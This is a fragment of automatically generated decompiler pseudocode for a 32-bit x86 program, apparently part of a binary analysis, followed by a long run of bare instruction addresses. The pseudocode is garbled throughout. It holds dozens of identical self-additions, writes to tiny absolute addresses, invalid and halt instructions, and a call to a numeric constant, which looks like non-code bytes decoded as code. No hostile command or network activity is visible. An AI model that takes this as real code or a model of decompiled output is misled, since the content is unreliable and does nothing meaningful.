                    				 *((intOrPtr*)(_t595 + 0x11)) =  *((intOrPtr*)(_t595 + 0x11)) + _t745;
                    				_t596 = _t595 + 1;
                    				 *((intOrPtr*)(_t758 + _t758 + 0x11760040)) =  *((intOrPtr*)(_t758 + _t758 + 0x11760040)) + _t596;
                    				_t599 = _t596 + 0x00000001 + _t596 + 0x00000001 ^ 0x00000040;
                    				 *((intOrPtr*)(_t599 - 0x2fffbfca)) =  *((intOrPtr*)(_t599 - 0x2fffbfca)) + _t745;
                    				_t600 = _t599 + 1;
                    				 *((intOrPtr*)(_t750 + _t758)) =  *((intOrPtr*)(_t750 + _t758)) + _t600;
                    				_t601 = _t600 + 1;
                    				 *((intOrPtr*)(_t730 + 0x40 + _t745)) =  *((intOrPtr*)(_t730 + 0x40 + _t745)) + _t693;
                    				 *_t601 =  *_t601 + _t745;
                    				asm("aaa");
                    				_t602 = _t601 + 1;
                    				 *_t602 =  *_t602 + _t602;
                    				 *_t602 =  *_t602 ^ _t602;
                    				 *_t602 =  *_t602 + _t602;
                    				 *_t602 =  *_t602 + _t602;
                    				 *_t602 =  *_t602 + _t602;
                    				 *_t602 =  *_t602 + _t602;
                    				 *_t602 =  *_t602 + _t602;
                    				 *_t602 =  *_t602 + _t602;
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t602 =  *_t602 + _t602;
                    				 *_t602 =  *_t602 + _t602;
                    				asm("insb");
                    				if( *_t602 > 0) {
                    					 *((intOrPtr*)(_t758 + 0x7b8c0041 + _t760 * 2)) =  *((intOrPtr*)(_t758 + 0x7b8c0041 + _t760 * 2)) + _t730;
                    					_t731 =  &(_t730[0]);
                    					 *((intOrPtr*)(_t731 + 0x41 + _t760 * 2)) =  *((intOrPtr*)(_t731 + 0x41 + _t760 * 2)) + _t693;
                    					_t663 = _t731 + _t602;
                    					asm("outsd");
                    					_t732 =  &(_t731[0]);
                    					 *((intOrPtr*)(_t663 + 0x4800416c)) =  *((intOrPtr*)(_t663 + 0x4800416c)) + _t732;
                    					_push(0x72d40041);
                    					_t733 =  &(_t732[0]);
                    					 *_t733 =  *_t733 + 0xf0;
                    					_t665 = _t663 + _t693 + _t663 + _t693;
                    					_push(0x66fc0041);
                    					 *((intOrPtr*)(_t745 + _t760 * 2)) =  *((intOrPtr*)(_t745 + _t760 * 2)) + _t665;
                    					_t602 = _t665 + _t745;
                    					_push(0x41);
                    					 *((intOrPtr*)(_t602 + 0x4000416b)) =  *((intOrPtr*)(_t602 + 0x4000416b)) + _t745;
                    					_t730 =  &(_t733[1]);
                    					 *((intOrPtr*)(_t602 + 0x6800416d)) =  *((intOrPtr*)(_t602 + 0x6800416d)) + _t730;
                    				}
                    				_t605 = _t602 + 1 + _t602 + 1 + 1;
                    				 *_t605 =  *_t605 + _t605;
                    				asm("adc [eax], eax");
                    				_t606 = _t605 ^ 0x00000000;
                    				 *_t606 =  *_t606 + _t606;
                    				asm("hlt");
                    				_t607 = _t606 + 1;
                    				 *_t730 =  *_t730 + _t607;
                    				 *_t693 =  *_t693 + _t607;
                    				 *_t607 =  *_t607 + _t607;
                    				 *_t607 =  *_t607 + _t607;
                    				 *_t607 =  *_t607 + _t607;
                    				 *_t607 =  *_t607 + _t607;
                    				_t730[0x10] = _t730[0x10] + _t745;
                    				_t608 = _t607 + _t607;
                    				_t694 = 0xd4004167;
                    				 *_t608 =  *_t608 & _t608;
                    				_t610 = _t608 + 0x30;
                    				 *_t730 =  *_t730 + _t610;
                    				 *_t694 =  *_t694 + _t610;
                    				 *_t610 =  *_t610 + _t610;
                    				_pop(ds);
                    				 *_t610 =  *_t610 + _t694;
                    				 *_t610 =  *_t610 + _t610;
                    				 *((intOrPtr*)(_t750 + 0x40 + _t760)) =  *((intOrPtr*)(_t750 + 0x40 + _t760)) + _t730;
                    				_t695 = _t694 + _t694;
                    				asm("invalid");
                    				 *_t610 =  *_t610 + 1;
                    				 *_t610 =  *_t610 + _t610;
                    				 *_t610 =  *_t610 + _t610;
                    				 *_t610 =  *_t610 + _t610;
                    				_t611 = _t610 + _t745;
                    				 *_t611 =  *_t611 & _t611;
                    				asm("lock pop ebx");
                    				 *_t611 =  *_t611 & _t611;
                    				if( *_t611 >= 0) {
                    					_t660 = _t611 + 1;
                    					_t695 = _t695 + _t695;
                    					asm("invalid");
                    					 *_t660 =  *_t660 + 1;
                    					 *_t660 =  *_t660 + _t660;
                    					 *_t660 =  *_t660 + _t660;
                    					_t661 = _t660 + 1;
                    					 *0x300 =  *0x300 + _t661;
                    					 *_t661 =  *_t661 + _t661;
                    					 *_t661 =  *_t661 + _t661;
                    					 *_t661 =  *_t661 + _t661;
                    					 *((intOrPtr*)(0x40 + _t745)) =  *((intOrPtr*)(0x40 + _t745)) + _t661;
                    					 *_t661 =  *_t661 + _t661;
                    					_pop(_t772);
                    					 *_t661 =  *_t661 & _t661;
                    					asm("das");
                    					_t611 = _t772 + 1;
                    					 *0x40000300 =  *0x40000300 + _t611;
                    				}
                    				 *_t730 =  *_t730 + _t611;
                    				 *_t611 =  *_t611 + _t611;
                    				 *_t611 =  *_t611 + _t611;
                    				_t612 = _t611 + 1;
                    				 *_t758 =  *_t758 + _t612;
                    				 *_t695 =  *_t695 + _t612;
                    				 *_t612 =  *_t612 + _t612;
                    				 *_t612 =  *_t612 + _t612;
                    				 *_t612 =  *_t612 + _t612;
                    				 *_t612 =  *_t612 + _t612;
                    				 *((intOrPtr*)(_t612 + 0x4022)) =  *((intOrPtr*)(_t612 + 0x4022)) + _t612;
                    				 *_t612 =  *_t612 & _t612;
                    				asm("pushfd");
                    				asm("das");
                    				_t613 = _t612 + 1;
                    				 *_t758 =  *_t758 + _t613;
                    				 *_t695 =  *_t695 + _t613;
                    				 *_t613 =  *_t613 + _t613;
                    				_t614 = _t613 | 0x00004400;
                    				 *((intOrPtr*)(_t750 + _t760 + 0x40040)) =  *((intOrPtr*)(_t750 + _t760 + 0x40040)) + _t614;
                    				_t615 = _t614 +  *_t614;
                    				 *_t615 =  *_t615 + _t615;
                    				 *_t615 =  *_t615 + _t615;
                    				 *_t615 =  *_t615 + _t615;
                    				 *_t615 =  *_t615 + _t615;
                    				asm("pushfd");
                    				asm("adc [ecx], bl");
                    				 *0x00000060 =  *((intOrPtr*)(0x60)) + 0x30;
                    				_t620 = 0x30 +  *((intOrPtr*)(0x30)) + 1;
                    				 *_t730 =  *_t730 + _t745;
                    				 *_t620 =  *_t620 + _t730;
                    				 *_t620 =  *_t620 + _t620;
                    				asm("hlt");
                    				_t621 = _t620 + 1;
                    				 *_t695 =  *_t695 + _t621;
                    				 *_t695 =  *_t695 + _t621;
                    				 *_t621 =  *_t621 + _t621;
                    				 *_t621 =  *_t621 + _t621;
                    				 *_t621 =  *_t621 + _t621;
                    				 *_t621 =  *_t621 + _t621;
                    				_t623 = _t621 + _t730 &  *(_t621 + _t730);
                    				asm("loopne 0x5d");
                    				 *_t623 =  *_t623 & _t623;
                    				 *_t695 =  *_t695 + _t623;
                    				 *_t623 =  *_t623 + _t623;
                    				asm("adc [eax], eax");
                    				 *_t623 =  *_t623 + _t623;
                    				_t625 = _t623 + _t745 + 1;
                    				 *_t745 =  *_t745 + _t625;
                    				 *_t695 =  *_t695 + _t625;
                    				 *_t625 =  *_t625 + _t625;
                    				 *_t625 =  *_t625 + _t625;
                    				 *_t625 =  *_t625 + _t625;
                    				 *_t625 =  *_t625 + _t625;
                    				 *((intOrPtr*)(_t695 + 0x40)) =  *((intOrPtr*)(_t695 + 0x40)) + _t625;
                    				_t626 = _t625 + 0x2f;
                    				 *_t626 =  *_t626 & _t626;
                    				asm("enter 0x402f, 0x0");
                    				_t750[9] = _t730 + _t750[9];
                    				_t630 = (_t626 +  *_t626 +  *((intOrPtr*)(_t626 +  *_t626)) &  *(_t626 +  *_t626 +  *((intOrPtr*)(_t626 +  *_t626)))) + 1;
                    				 *0xFFFFFFFFDE008047 =  *((intOrPtr*)(0xffffffffde008047)) + _t630;
                    				_t631 = _t630 & 0x00000040;
                    				 *((intOrPtr*)(_t750 - 0x30ffbfdd)) =  *((intOrPtr*)(_t750 - 0x30ffbfdd)) + 0x2f;
                    				asm("iretd");
                    				asm("jecxz 0x25");
                    				 *0xf7004023 =  *0xf7004023 + _t730;
                    				 *_t750 =  *_t750 + 0xf7004023;
                    				_t636 = (_t631 &  *_t631 &  *(_t631 &  *_t631)) + 0x00000001 & 0x40;
                    				_t750[9] = _t750[9] + _t636;
                    				 *0xFFFFFFFFF7004047 =  *((intOrPtr*)(0xfffffffff7004047)) + 0xf7004023;
                    				 *((intOrPtr*)(_t750 - 0x54ffbfdc)) =  *((intOrPtr*)(_t750 - 0x54ffbfdc)) + _t745;
                    				 *((intOrPtr*)(_t750 - 0x2cffbfdc)) =  *((intOrPtr*)(_t750 - 0x2cffbfdc)) + 0xf7004023;
                    				_t641 = _t636 + 2 & 0x40;
                    				 *_t641 =  *_t641 + _t641;
                    				 *_t641 =  *_t641 + _t641;
                    				 *_t641 =  *_t641 + _t745;
                    				 *((intOrPtr*)(_t760 + 0x8884063)) =  *((intOrPtr*)(_t760 + 0x8884063)) + _t745;
                    				_t643 = _t641 + 2;
                    				 *((intOrPtr*)(_t758 - 0x6bffbfef)) =  *((intOrPtr*)(_t758 - 0x6bffbfef)) + _t730;
                    				asm("adc [eax], eax");
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *_t643 =  *_t643 + _t643;
                    				 *((intOrPtr*)(_t760 + 0x8884063)) =  *((intOrPtr*)(_t760 + 0x8884063)) + _t745;
                    				_t645 = _t643 + 2;
                    				 *((intOrPtr*)(_t758 - 0x6bffbfef)) =  *((intOrPtr*)(_t758 - 0x6bffbfef)) + _t730;
                    				asm("adc [eax], eax");
                    				 *_t645 =  *_t645 + _t645;
                    				 *_t645 =  *_t645 + _t645;
                    				 *_t645 =  *_t645 + _t645;
                    				 *_t645 =  *_t645 + _t645;
                    				 *_t645 =  *_t645 + _t645;
                    				 *_t645 =  *_t645 + _t645;
                    				 *_t645 =  *_t645 + _t645;
                    				 *_t645 =  *_t645 + _t645;
                    				 *_t645 =  *_t645 + _t645;
                    				 *_t645 =  *_t645 + _t645;
                    				 *_t645 =  *_t645 + _t645;
                    				 *_t645 =  *_t645 + _t645;
                    				_t647 = _t645 + 0x00000001 & 0x00000040;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *_t647 =  *_t647 + _t647;
                    				 *((intOrPtr*)(0x40 + _t647)) =  *((intOrPtr*)(0x40 + _t647)) + _t647;
                    				 *((intOrPtr*)(_t760 + 0x8884063)) =  *((intOrPtr*)(_t760 + 0x8884063)) + _t745;
                    				_t648 = _t647 + 1;
                    				 *((intOrPtr*)(_t758 - 0x6bffbfef)) =  *((intOrPtr*)(_t758 - 0x6bffbfef)) + _t730;
                    				asm("adc [eax], eax");
                    				 *_t648 =  *_t648 + _t648;
                    				 *_t648 =  *_t648 + _t648;
                    				 *_t648 =  *_t648 + _t648;
                    				 *_t648 =  *_t648 + _t648;
                    				 *_t648 = fs;
                    				 *((intOrPtr*)(_t760 + 0x8884063)) =  *((intOrPtr*)(_t760 + 0x8884063)) + _t745;
                    				_t650 = _t648 + 2;
                    				 *((intOrPtr*)(_t758 - 0x6bffbfef)) =  *((intOrPtr*)(_t758 - 0x6bffbfef)) + _t730;
                    				asm("adc [eax], eax");
                    				 *_t650 =  *_t650 + _t650;
                    				 *_t650 =  *_t650 + _t650;
                    				 *_t650 =  *_t650 + _t650;
                    				 *_t650 =  *_t650 + _t650;
                    				 *((intOrPtr*)(_t760 + 0x8884063)) =  *((intOrPtr*)(_t760 + 0x8884063)) + _t745;
                    				 *((intOrPtr*)(_t758 - 0x6bffbfef)) =  *((intOrPtr*)(_t758 - 0x6bffbfef)) + _t730;
                    				asm("adc [eax], eax");
                    				 *0x00000022 =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
                    				 *((intOrPtr*)(_t760 + 0x8884063)) =  *((intOrPtr*)(_t760 + 0x8884063)) + _t745;
                    				 *((intOrPtr*)(_t758 - 0x6bffbfef)) =  *((intOrPtr*)(_t758 - 0x6bffbfef)) + _t730;
                    				asm("adc [eax], eax");
                    				 *0x00000024 =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
                    				 *((intOrPtr*)(_t760 + 0x8884063)) =  *((intOrPtr*)(_t760 + 0xffffffffff888086)) + _t745;
                    				 *((intOrPtr*)(_t758 - 0x6bffbfef)) =  *((intOrPtr*)(_t758 - 0x6bffbfef)) + _t730;
                    				asm("adc [eax], eax");
                    				 *0x00000047 =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
                    				0xb8(0x40119a);
                    			}
                    0x00401274
                    0x00401275
                    0x00401276
                    0x00401277
                    0x00401279
                    0x0040127b
                    0x0040127c
                    0x0040127f
                    0x0040127f
                    0x00401282
                    0x00401285
                    0x00401287
                    0x00401289
                    0x0040128a
                    0x0040128b
                    0x0040128c
                    0x00401297
                    0x00401299
                    0x0040129b
                    0x0040129c
                    0x0040129e
                    0x0040129f
                    0x004012a2
                    0x004012a4
                    0x004012a6
                    0x004012a8
                    0x004012aa
                    0x004012ad
                    0x004012ae
                    0x004012af
                    0x004012b0
                    0x004012b4
                    0x004012b6
                    0x004012b8
                    0x004012b9
                    0x004012ba
                    0x004012bb
                    0x004012bc
                    0x004012bd
                    0x004012c3
                    0x004012c9
                    0x004012cb
                    0x00000000
                    0x004012cb
                    0x00401282
                    0x0040126d
                    0x004012f8
                    0x004012fa
                    0x004012fc
                    0x004012fe
                    0x00401300
                    0x00401303
                    0x00401304
                    0x00401305
                    0x00401306
                    0x00401307
                    0x0040130a
                    0x0040130c
                    0x0040130e
                    0x0040130f
                    0x00401310
                    0x00401311
                    0x00401312
                    0x00401313
                    0x00401314
                    0x00401317
                    0x00401319
                    0x0040131f
                    0x00401321
                    0x00401323
                    0x00401325
                    0x00401328
                    0x0040132b
                    0x0040132e
                    0x0040132f
                    0x00401330
                    0x00401333
                    0x00401335
                    0x00401336
                    0x00401339
                    0x0040133a
                    0x0040133b
                    0x0040133e
                    0x00401343
                    0x00401344
                    0x00401345
                    0x0040134a
                    0x0040134c
                    0x0040134e
                    0x00401350
                    0x00401355
                    0x00401356
                    0x0040138a
                    0x0040138a
                    0x0040138b
                    0x0040138d
                    0x0040138f
                    0x00401392
                    0x00401393
                    0x00401395
                    0x00401397
                    0x00401399
                    0x0040139c
                    0x0040139d
                    0x0040139f
                    0x00401359
                    0x00401359
                    0x0040135b
                    0x0040135c
                    0x0040135e
                    0x00401360
                    0x00401362
                    0x00401366
                    0x00401368
                    0x0040136a
                    0x0040136c
                    0x0040136d
                    0x0040136d
                    0x00401371
                    0x00401374
                    0x00401376
                    0x00401377
                    0x00401379
                    0x0040137b
                    0x0040137d
                    0x0040137f
                    0x00401381
                    0x00401384
                    0x00401385
                    0x00401389
                    0x00000000
                    0x00401389
                    0x00401371
                    0x004013a6
                    0x004013a8
                    0x004013a9
                    0x004013ac
                    0x004013ad
                    0x004013af
                    0x004013b1
                    0x004013b4
                    0x004013b6
                    0x004013b7
                    0x004013b9
                    0x004013be
                    0x004013c0
                    0x004013c2
                    0x004013c4
                    0x004013c6
                    0x004013c8
                    0x004013ca
                    0x004013cc
                    0x004013cd
                    0x004013d1
                    0x004013d2
                    0x004013d3
                    0x004013d5
                    0x004013d7
                    0x004013dd
                    0x004013df
                    0x004013e1
                    0x004013e3
                    0x004013e5
                    0x004013e7
                    0x004013e9
                    0x004013ec
                    0x004013ee
                    0x004013f0
                    0x004013f6
                    0x004013f8
                    0x004013fa
                    0x004013fc
                    0x004013fe
                    0x00401400
                    0x00401402
                    0x00401404
                    0x00401406
                    0x00401407
                    0x00401409
                    0x00401409
                    0x0040140a
                    0x0040140b
                    0x0040140d
                    0x0040140f
                    0x00401411
                    0x00401413
                    0x00401415
                    0x00401417
                    0x00401419
                    0x0040141b
                    0x0040141d
                    0x0040141f
                    0x00401422
                    0x00401423
                    0x00401425
                    0x00401427
                    0x00401429
                    0x0040142e
                    0x00401430
                    0x00401432
                    0x00401434
                    0x00401436
                    0x00401436
                    0x00401437
                    0x00401439
                    0x0040143b
                    0x00401443
                    0x00401445
                    0x00401447
                    0x00401449
                    0x0040144a
                    0x0040144c
                    0x0040144e
                    0x00401450
                    0x00401452
                    0x00401454
                    0x00401456
                    0x00401458
                    0x00401459
                    0x0040145b
                    0x0040145d
                    0x0040145f
                    0x00401461
                    0x00401466
                    0x00401468
                    0x0040146a
                    0x0040146c
                    0x0040146e
                    0x00401470
                    0x00401472
                    0x00401479
                    0x0040147a
                    0x0040147b
                    0x0040147d
                    0x0040147f
                    0x00401482
                    0x00401484
                    0x00401486
                    0x00401488
                    0x0040148a
                    0x0040148c
                    0x0040148e
                    0x00401490
                    0x00401491
                    0x00401493
                    0x00401495
                    0x00401497
                    0x00401499
                    0x0040149e
                    0x004014a0
                    0x004014a2
                    0x004014a4
                    0x004014a6
                    0x004014a8
                    0x004014aa
                    0x004014ae
                    0x004014af
                    0x004014b5
                    0x004014b7
                    0x004014bd
                    0x004014bf
                    0x004014c1
                    0x004014c3
                    0x004014c5
                    0x004014c7
                    0x004014c9
                    0x004014cb
                    0x004014cd
                    0x004014cf
                    0x004014d1
                    0x004014d6
                    0x004014d8
                    0x004014da
                    0x004014dc
                    0x004014de
                    0x004014e0
                    0x004014e2
                    0x004014e6
                    0x004014e7
                    0x004014ed
                    0x004014ef
                    0x004014f1
                    0x004014f3
                    0x004014f5
                    0x004014f7
                    0x004014f9
                    0x004014fb
                    0x004014fd
                    0x004014ff
                    0x00401506
                    0x00401507
                    0x00401509
                    0x0040150e
                    0x00401510
                    0x00401512
                    0x00401514
                    0x00401516
                    0x00401516
